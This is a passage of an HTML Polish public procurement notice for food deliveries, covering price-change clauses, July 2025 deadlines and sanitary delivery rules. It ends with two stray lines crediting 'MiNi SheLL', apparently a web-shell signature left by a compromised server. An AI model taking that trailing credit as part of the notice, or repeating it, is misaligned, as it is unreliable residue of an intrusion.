wskazanego w załączniku nr 1 do umowy wzrośnie o co najmniej 20 %, w porównaniu do cen przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie, Zamawiający może wyrazić zgodę na podwyższenie wynagrodzenia o różnicę cen asortymentu wyszczególnionego w Wykazie do aneksu, pomiędzy udowodnionymi wartościami ceny przyjętej w celu ustalenia wynagrodzenia wykonawcy zawartego w ofercie a wartościami tych cen po upływie 6 miesięcy, a w dalszej kolejności co 6 miesięcy. Podwyższenie wynagrodzenie może nastąpić o wartość różnicy cen asortymentu przyjętego w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie a cenami występującymi po 6 miesiącach realizacji umowy, pomnożoną o potrzebne ilości materiałów i kosztów do końca realizacji umowy. Zestawienie cen stanowiące podstawę wyliczenia wynagrodzenia będzie stanowiło załącznik do aneksu do umowy. <br/>d)	Przez zmianę ceny asortymentu rozumie się wzrost odpowiednio cen, jak i ich obniżenie, względem cen przyjętych w celu ustalenia wynagrodzenia wykonawcy zawartego w ofercie. W przypadku obniżenia cen asortymentu wykonawca przedstawia także aneks do umowy w sposób jak opisano o podwyżkach, z zastrzeżeniem przedstawienia cen początkowych oraz obniżonych co 6 miesięcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem: https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-5d5d5ca3-38f5-4e0a-8187-d8c57c3f4a35</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-31 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wymagania dla wszystkich grup asortymentowych:<br/> Wszystkie towary będące przedmiotem zamówienia muszą spełniać wymogi określone<br/>w Ustawie o bezpieczeństwie żywności i żywienia oraz aktów wykonawczych wydanych na tej podstawie.<br/> Produkcja i dostawy realizowane będą zgodnie z normami jakościowymi systemu HACCP.<br/> Wykonawca zobowiązuje się dostarczyć każdorazowo towar odpowiedniej jakości, tzn. świeży, nie przeterminowany, nie z<br/>kończącym się terminem przydatności do spożycia, |<br/>w odpowiednim gatunku. Termin przydatności do spożycia musi być podany w sposób widoczny na opakowaniu.<br/> Towar musi być dostarczony w nie uszkodzonych atestowanych opakowaniach, spełniających wymagania sanitarnoepidemiologiczne.<br/>Elementy muszą być ułożone tak w opakowaniach aby nie uległy deformacji.<br/> Osoba realizująca dostawę musi posiadać aktualną książeczkę zdrowia oraz samochód przystosowany i dopuszczony<br/>przez Sanepid do transportu produktów spożywczych.<br/> Zamawiającemu przysługuje prawo do zbadania towaru podczas odbioru, w tym:<br/>• warunków transportu (czystość środka transportu, opakowań i innych warunków mających wpływ na jakość zdrowotną<br/>przewożonych artykułów)<br/>• sposobu wyładowania towaru (zapobieganie zanieczyszczenia towaru podczas rozładunku)<br/>• dokumentacji dotyczącej dostarczonych produktów, w tym: producenta, daty produkcji, świadectwa kontroli jakości<br/>• oznakowania towaru – czytelny termin przydatności do spożycia lub data minimalnej trwałości<br/>• opakowania – brak uszkodzeń, widocznych zanieczyszczeń, pęknięć, rozdarć, itp. zgodności z zamówieniem.<br/> Zamawiający może odmówić odbioru towaru jeżeli nie spełnia wymaganych warunków sanitarnych, jakościowych lub<br/>ilościowych.<br/>3. Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne Grupy Asortymentowe. Każda grupa<br/>asortymentowa będzie rozpatrywana indywidualnie. Wykonawca może złożyć ofertę na wszystkie Grupy Asortymentowe.<br/>4. Wskazane w opisie przedmiotu zamówienia ilości minimalne i maksymalne należy traktować jako szacunkowe.<br/>Zamawiający zastrzega sobie prawo niewykonania w całości przedmiotu zamówienia w czasie obowiązywania umowy,<br/>jeżeli jego rzeczywiste potrzeby będą mniejsze od zamawianych. W przypadku, gdy ilość zakupionych artykułów w okresie<br/>obowiązywania umowy będzie mniejsza od ilości przedstawionej w opisie przedmiotu zamówienia, Zamawiający ma prawo<br/>nie zrealizować dalszych zakupów artykułów żywnościowych bez jakichkolwiek konsekwencji finansowych i odszkodowań<br/>na rzecz Wykonawcy. Zamawiający gwarantuje niniejszym zrealizowanie zamówienia w wartości nie mniejszej niż 70% ceny<br/>podanej w ofercie Wykonawcy za wykonanie danej części zamówienia.<br/>5. Zamawiający przewiduje przerwę w zamawianiu dostaw określonych w SWZ w dniach wolnych od nauki wynikających z<br/>organizacji roku szkolnego (np. w okresie świątecznym)<br/>c.d. Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia:<br/>e) Wykonawca, którego wynagrodzenie zostało zmienione, zobowiązany jest do zmiany wynagrodzenia przysługującego<br/>podwykonawcy/podwykonawcom, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen asortymentu<br/>dotyczącego zobowiązania podwykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com